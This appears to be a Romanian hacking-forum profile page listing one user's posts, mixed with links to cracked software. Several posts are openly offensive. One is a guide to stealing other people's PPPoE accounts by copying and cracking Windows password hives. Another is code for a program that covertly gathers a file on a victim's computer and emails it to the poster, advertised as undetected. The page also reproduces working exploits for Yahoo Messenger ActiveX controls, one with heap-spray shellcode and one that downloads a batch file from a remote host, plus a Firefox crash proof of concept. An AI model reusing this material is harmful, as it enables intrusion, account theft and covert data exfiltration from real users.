Jump to content

puskin

Active Members
  • Posts

    430
  • Joined

  • Last visited

Everything posted by puskin

  1. Mai jos aveti link-ul de unde puteti downloada KAV sau KIS versiunea 8.0.0.294 pt. anul 2009 include si licenta care se poate reinoi: http://devbuilds.kaspersky-labs.com/devbuilds/devbuilds/8.0.0.292/KAV/English/2008_03_18_17_33/
  2. puskin

    Closed

    Salve! 1.Foloseste algoritm in VB6 2.Dau modulul de encryptare-decryptare Link pt Download module : http://rapidshare.com/files/108973007/modules.zip.html Mai jos sa vedeti cum arata incriptarea si textul encryptat: Public Function UUEncodeFile(strFilePath As String) As String Dim intFile As Integer 'file handler Dim intTempFile As Integer 'temp file Dim lFileSize As Long 'size of the file Dim strFileName As String 'name of the file Dim strFileData As String 'file data chunk Dim lEncodedLines As Long 'number of encoded lines Dim strTempLine As String 'temporary string Dim i As Long 'loop counter Dim j As Integer 'loop counter Dim strResult As String 'Get file name strFileName = Mid$(strFilePath, InStrRev(strFilePath, "\") + 1) 'This important: "begin 664" strResult = "begin 664 " + strFileName + vbLf 'Get file size lFileSize = FileLen(strFilePath) lEncodedLines = lFileSize / 45 + 1 'you need to encode every 45 bytes strFileData = Space(45) intFile = FreeFile 'open the output file Open strFilePath For Binary As intFile For i = 1 To lEncodedLines If i = lEncodedLines Then strFileData = Space(lFileSize Mod 45) End If 'get data Get intFile, , strFileData 'the first byte in a line is a char, which number describes 'how many bytes are in the line strTempLine = Chr(Len(strFileData) + 32) If i = lEncodedLines And (Len(strFileData) Mod 3) Then strFileData = strFileData + Space(3 - (Len(strFileData) Mod 3)) End If 'now some encoding For j = 1 To Len(strFileData) Step 3 strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j, 1)) \ 4 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j, 1)) Mod 4) * 16 _ + Asc(Mid(strFileData, j + 1, 1)) \ 16 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j + 1, 1)) Mod 16) * 4 _ + Asc(Mid(strFileData, j + 2, 1)) \ 64 + 32) strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j + 2, 1)) Mod 64 + 32) Next j strResult = strResult + strTempLine + vbLf strTempLine = "" 'get next line Next i 'close the file Close intFile 'add the "end" string strResult = strResult & "'" & vbLf + "end" + vbLf 'return the encoded string UUEncodeFile = strResult End Function Aici decryptorul: Public Function UUDecodeToFile(strUUCodeData As String, strFilePath As String) On Error Resume Next Dim vDataLine As Variant 'some variables needed for decoding Dim vDataLines As Variant Dim strDataLine As String Dim intSymbols As Integer Dim intFile As Integer Dim strTemp As String If Left$(strUUCodeData, 6) = "begin " Then 'check if it is a encoded file strUUCodeData = Mid$(strUUCodeData, InStr(1, strUUCodeData, vbLf) + 1) End If If Right$(strUUCodeData, 4) = "end" + vbLf Then 'check if "end" is available strUUCodeData = Left$(strUUCodeData, Len(strUUCodeData) - 7) End If intFile = FreeFile Open strFilePath For Binary As intFile 'open output file vDataLines = Split(strUUCodeData, vbLf) For Each vDataLine In vDataLines 'get every line strDataLine = CStr(vDataLine) intSymbols = Asc(Left$(strDataLine, 1)) 'get number of chars in 'one line. This is important 'for decoding strDataLine = Mid$(strDataLine, 2, intSymbols) For i = 1 To Len(strDataLine) Step 4 'now some decoding strTemp = strTemp + Chr((Asc(Mid(strDataLine, i, 1)) - 32) * 4 + _ (Asc(Mid(strDataLine, i + 1, 1)) - 32) \ 16) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 1, 1)) Mod 16) * 16 + _ (Asc(Mid(strDataLine, i + 2, 1)) - 32) \ 4) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 2, 1)) Mod 4) * 64 + _ Asc(Mid(strDataLine, i + 3, 1)) - 32) Next i 'put the decoded data in the file Put intFile, , strTemp strTemp = "" Next 'close the file Close intFile End Function Si textul : begin 664 sysdll.txtend Ca sa fiu mai explicit: -programul genereaza fisierul pe calculatorul iar cand atinge dimeniunea de 5000 de biti (5Kb) este incryptat si trimis ca attach pe mail...numai ca el imi vine pe email in urmatorul mod (in nici un caz attach!)...e vreo posibilitate sa decodez textul?:
  3. alta data sa nu mai bagati screen-uri ca pot si eu sa copii imaginea in care scrie "parola sparta" pe Command2 sa o redenumesc pe comp la mine si so urc din nou pe net si "Gata am spart parola LOL"
  4. Imi retrag cuvintele...e aproape imposibil de decriptat nu imposibil......
  5. e imposibil de decriptat textul din imagine cel putin pt. nivelul meu de pregatire, fara sa stiu daca exista o cheie de criptare, si in cele din urma fara timpul necesar...
  6. 35a4 - w88a - 1123 - flo1 :) lol
  7. Acum lucrez la un program pt. matzele alea de pe rapid share :D:D
  8. <SCRIPT> PERL=MANELE TATA=MAMA "-1"(oIo) THREAD J WINAMP FILE GUTA SALAM' END SCRIPT "VOTKA" </SCRIPT> Ia vezi ruleaza? Helloooooooooooo wakeup :idea: Nu am zis ca am scris eu script-ul ci doar l-am compilat, deoarece nu am gasit nicaieri postat fisierul decode.pl, caci daca il gaseam ii dadeam copy paste era mai simplu decat sa-l compilez, sa-l testez sa vad daca merge si sa il mai si explic aici pe forum pt n00bi Eu zic ca se poate muta la "trash" post-ul asta....voi ce ziceti
  9. Chiar nu puteti face nimic la cei care se baga aiurea in thread-uri de profil...? Azi m-am chinuit si eu sa fac un patch pt un program si sa-l postez cat mai repede ca lumea sa poata beneficia de el...si hopa surpriza : http://rstcenter.com/forum/3wplayer-hack-crack-t11435.rst Primu imi raspunde: daca ti-am pus screenshot tu ce zici? sa zicem ca inca n-am incredere in tine ceva nou: http://www.maneletube.com/ Si acum al doilea: Se zice ca majoritatea decide , si cat timp majoritatea vor manele asta e . De ce rezista manelele ? Pai simplu : 1. ritmu oriental 2. cuvinte ca bani ,femei ,bautura , sunt no 1 , sa moara dusmani care au priza la orice om . 3. La un chef vrei sa vezi cum da femeia din buci , nu din plete . Ce legatura au manele cu programul de decriptare????? Lol asta nu o sa inteleg niciodata ! Va rog adminilor sau moderatorilor paziti herghelia bine daca nu vreti sa apara toata discografia lui Guta in posturile de exploituri sau programare :)
  10. Personal l-am testat pe McAffe Visual Trace care imi era expirat de prin 11.2007 si a mers perfect (s-ar putea sa trebuiasca sa stii perioada cand a functionat trial pe comp. tau...dar nu stiu exact...)
  11. lasa si tu id-ul de la adresa care "ti-a fost sparta" asa e normal....
  12. V-ati saturat de programele ce expira dupa 15 zile sau 30 de zile asa zisele trial-uri...?Acest program va permite sa rulati un program expirat daca introduceti o data calendaristica din perioada cand era inca activ.Programul va rula in perioada scrisa de timp.Data sistemului nu este afectata. Download: http://rapidshare.com/files/109473123/BW-CRACKER.exe.html P.S: v-am pus si o poza faina sa nu va pliktis cat incarca programul
  13. daca ti-am pus screenshot tu ce zici?
  14. Pentru cei ce gasesc pe torrenti un film care la deschidere cere 3wplayer pentru decodare trebuie sa urmeze urmatoarea procedura: Download crack: http://rapidshare.com/files/109450206/3wplayer-hack.zip.html Contine Activ Pearl pt. windows xp(nu am incercat pe vista) si Fisierul in perl decode.pl Ce trebuie sa faceti: Instalati AP care va forma un folder C:\Perl Copiati fisierul decode.pl in C:\Perl\eg\decode.pl Deschideti Total Commander si duceti-va in acel director, selectati decode.pl mai jos in campul de comanda de la total commander scrieti CMD, vi se va deschide consola de command prompt. Copiati filmul incriptat in directorul C:\Perl\eg unde aveti si fisierul decode.pl In consola (cmd) scrieti: C:\Perl\eg> perl decode.pl FILM_INCRIPTAT.avi FILM_DECRIPTAT.avi Daca numele are spatii scrieti asa: perl decode.pl "FILM XXX XXXX.avi" "FILM-CUMVREITU.avi"
  15. sal, pune o poza te rog cu automatu
  16. mai avea putin pe virustotal si batea recordurile la fisiere infectate :)) mai fratilor m-am prins: voi vreti sa faceti aici o baza de date cu antichitati, de genul vx heavens ganditi inainte de a posta ce postati. Cred ca se poate inchide topicul voi ce spuneti?
  17. Tare greu e sa tst www.google.com si sa scri numele programelor....nu vreti sa vi le trimit prin prioripost acasa la usa? Nu te poate vedea doar daca raporteaza persoana care detine contul ca nui merge net-ul..doar atunci verifica In momentul conectarii pe pppoe ip-ul este la fel cu al victimei iar ip-ul placii de retea poate fi variabil daca este pe "obtain automatic" iar adresa de mac este aceeasi....doar sa nu aiba nod-uri active switch-uri cu protocoale instalate pe ele.... Multi in timpul zilei pana in orele 16-17 nu folosesc internetul de acasa deci sunt offline dai ping sa vezi care cont este offline si intri pe el..cand incepe sa mearga mai greu, adica sa scada viteza te deconectezi si treci pe altul...
  18. Stiu ca acest subiect nu mai este de actualitate dar hai sa ne reamintim putin de copilarie CUM SA FURI CONTURI DE PPPOE SUNT NECESARE URMATOARELE PROGRAME: Angry IP scanner 2.21 cu optiunea de "MAC" activata Strong dc 1.00 rc10(client huburi odc) Proactive System Password Recovery v5, 3, 0, 653 Metoda: Se stie ca userul si parola contului sunt stocate in: Windows\System32\Config\ sub forma a doua fisiere: SYSTEM si SECURITY Se intra pe reteaua proprie cu clientul de odc (necesita client care sa poata vedea ip-ului useru-lui si care sa aiba permisiuni de "allow sys file on") Se cauta cei cu windows-ul la share si se copie directorul "config" di System32, dupa care vedem Ip-ul celui de la care am copiat se baga in Ip Angry Scanner si se afla adresa de MAC(uneori merge si scanner-ul Amac address ) Dupa ce am strans datele pornim Proactive System Password Recovery v5, 3, 0, 653 si dam pe modul manual dupa care introducem fisierele SYSTEM si SECURITY pt. decodare md5 programul ne da contul. Asta e tot!Numai bine!
  19. Am gasit un cod de exploit pe un site din China, am stat 1 saptamana sa inteleg ce face de fapt, am reusit sa-l adaptez pt. VB6.Din motive de securitate nu pot posta varianta intreaga sau codul sursa. Download: http://rapidshare.com/files/108996983/BWBP.exe.html sau: BWBP exe
  20. puskin

    Closed

    Salve! Am nevoie de ajutor pentru a decrypta un text codat in limbajul VB6 Am modulul de encryptare-decryptare, am si textul care trebuie decriptat..(textul nu este important...vreau numai sa stiu daca functioneaza decryptorul...).Problema este urmatoarea am codat textul dar cand dau sa-l decodez surpriza...imi scoate fisierul cu txt "0 Biti". Cel mai bine ar fi sa se poata decoda direct textul, nu neaparat un fisier. Ii multumesc anticipat celui care ma ajuta. Link pt Download module : http://rapidshare.com/files/108973007/modules.zip.html Mai jos sa vedeti cum arata incriptarea si textul encryptat: P.S cine ma ajuta sa-l decodez primeste codul sursa + programul aplicatiei...care este 100% nedetectata 100% automata Public Function UUEncodeFile(strFilePath As String) As String Dim intFile As Integer 'file handler Dim intTempFile As Integer 'temp file Dim lFileSize As Long 'size of the file Dim strFileName As String 'name of the file Dim strFileData As String 'file data chunk Dim lEncodedLines As Long 'number of encoded lines Dim strTempLine As String 'temporary string Dim i As Long 'loop counter Dim j As Integer 'loop counter Dim strResult As String 'Get file name strFileName = Mid$(strFilePath, InStrRev(strFilePath, "\") + 1) 'This important: "begin 664" strResult = "begin 664 " + strFileName + vbLf 'Get file size lFileSize = FileLen(strFilePath) lEncodedLines = lFileSize / 45 + 1 'you need to encode every 45 bytes strFileData = Space(45) intFile = FreeFile 'open the output file Open strFilePath For Binary As intFile For i = 1 To lEncodedLines If i = lEncodedLines Then strFileData = Space(lFileSize Mod 45) End If 'get data Get intFile, , strFileData 'the first byte in a line is a char, which number describes 'how many bytes are in the line strTempLine = Chr(Len(strFileData) + 32) If i = lEncodedLines And (Len(strFileData) Mod 3) Then strFileData = strFileData + Space(3 - (Len(strFileData) Mod 3)) End If 'now some encoding For j = 1 To Len(strFileData) Step 3 strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j, 1)) \ 4 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j, 1)) Mod 4) * 16 _ + Asc(Mid(strFileData, j + 1, 1)) \ 16 + 32) strTempLine = strTempLine + Chr((Asc(Mid(strFileData, j + 1, 1)) Mod 16) * 4 _ + Asc(Mid(strFileData, j + 2, 1)) \ 64 + 32) strTempLine = strTempLine + Chr(Asc(Mid(strFileData, j + 2, 1)) Mod 64 + 32) Next j strResult = strResult + strTempLine + vbLf strTempLine = "" 'get next line Next i 'close the file Close intFile 'add the "end" string strResult = strResult & "'" & vbLf + "end" + vbLf 'return the encoded string UUEncodeFile = strResult End Function Aici decryptorul: Public Function UUDecodeToFile(strUUCodeData As String, strFilePath As String) On Error Resume Next Dim vDataLine As Variant 'some variables needed for decoding Dim vDataLines As Variant Dim strDataLine As String Dim intSymbols As Integer Dim intFile As Integer Dim strTemp As String If Left$(strUUCodeData, 6) = "begin " Then 'check if it is a encoded file strUUCodeData = Mid$(strUUCodeData, InStr(1, strUUCodeData, vbLf) + 1) End If If Right$(strUUCodeData, 4) = "end" + vbLf Then 'check if "end" is available strUUCodeData = Left$(strUUCodeData, Len(strUUCodeData) - 7) End If intFile = FreeFile Open strFilePath For Binary As intFile 'open output file vDataLines = Split(strUUCodeData, vbLf) For Each vDataLine In vDataLines 'get every line strDataLine = CStr(vDataLine) intSymbols = Asc(Left$(strDataLine, 1)) 'get number of chars in 'one line. This is important 'for decoding strDataLine = Mid$(strDataLine, 2, intSymbols) For i = 1 To Len(strDataLine) Step 4 'now some decoding strTemp = strTemp + Chr((Asc(Mid(strDataLine, i, 1)) - 32) * 4 + _ (Asc(Mid(strDataLine, i + 1, 1)) - 32) \ 16) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 1, 1)) Mod 16) * 16 + _ (Asc(Mid(strDataLine, i + 2, 1)) - 32) \ 4) strTemp = strTemp + Chr((Asc(Mid(strDataLine, i + 2, 1)) Mod 4) * 64 + _ Asc(Mid(strDataLine, i + 3, 1)) - 32) Next i 'put the decoded data in the file Put intFile, , strTemp strTemp = "" Next 'close the file Close intFile End Function Si textul : begin 664 sysdll.txtend Ca sa fiu mai explicit: -programul genereaza fisierul pe calculatorul iar cand atinge dimeniunea de 5000 de biti (5Kb) este incryptat si trimis ca attach pe mail...numai ca el imi vine pe email in urmatorul mod (in nici un caz attach!)...e vreo posibilitate sa decodez textul?:
  21. sorry man....ma cam luat valul..data viitoare nu o sa mai fac galagie ,numai bine!
  22. Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- [b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b] url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url] Author: shinnai mail: shinnai[at]autistici[dot]org site: [url]http://shinnai.altervista.org[/url] [b]<font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font>[/b] Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 [b]Marked as: RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False[/b] From remote: depends by Internet Explorer settings From local: yes [b]Description: This contron contains a "GetFile()" method which allows to download, on user's pc, an arbitrary file pased as argument. Remote execution depends by Internet Explorer settings, local execution works very well.[/b] [b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b] ----------------------------------------------------------------------------- <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" MsgBox "Exploit completed" End Sub </script> </span></span> </code></pre>
  23. Yahoo! Messenger ywcupl.dll ActiveX Control send() Remote Buffer Overflow Exploit <html> <!-- 45 minutes of fuzzing! Great results! very relible, runs calc.exe, replace with shellcode of your choice!!! link:[url]http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856[/url] maybe more vulz! Greetz to: str0ke and shinnai! --> <html> <object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object> <script> shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<800; x++) memory[x] = block + shellcode; var buffer = '\x0a'; while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; target.server = buffer; target.initialize(); target.send(); </script> </html>
  24. i######################### ######################### # # AmnPardaz Security Research & Penetration Testing Group # # Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service # Vendor URL: [url]www.mozilla.org[/url] # Version: <= 2.0.0.7 # Fix Available: Yes! # Soloution: Update to 2.0.0.8 # Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8! # Proof: [url]http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm[/url] # ######################### [url]WwW.AmnPardaz.com[/url] ######################## # # Leaders : Shahin Ramezany & Sorush Dalili # Team Members: Amir Hossein Khonakdar, Hamid Farhadi # Security Site: [url]WwW.BugReport.ir[/url] - [url]WwW.AmnPardaz.Com[/url] # Country: Iran # Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net # Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com> # ######################## Bug Description ########################### # # To do this work we need 2 files (Html,XML). # Their codes was written below. # # Save below codes in a HTML file. # -------------------------------------------------------------------- -------------------------------------------------------------------- <html> <head> <style>BODY{-moz-binding:url("moz.xml#xss")}</style> </head> <body> Suddenly see you baby! If you see this bug execution was failed! <script> alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir') </script> </body> </html> -------------------------------------------------------------------- -------------------------------------------------------------------- # # Save below codes in "moz.xml" file. # -------------------------------------------------------------------- -------------------------------------------------------------------- <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl"> <binding id="xss"> <implementation> <constructor><![CDATA[ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]></constructor> </implementation> </binding> </bindings> -------------------------------------------------------------------- -------------------------------------------------------------------- # # Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source. # ###################################################################
×
×
  • Create New...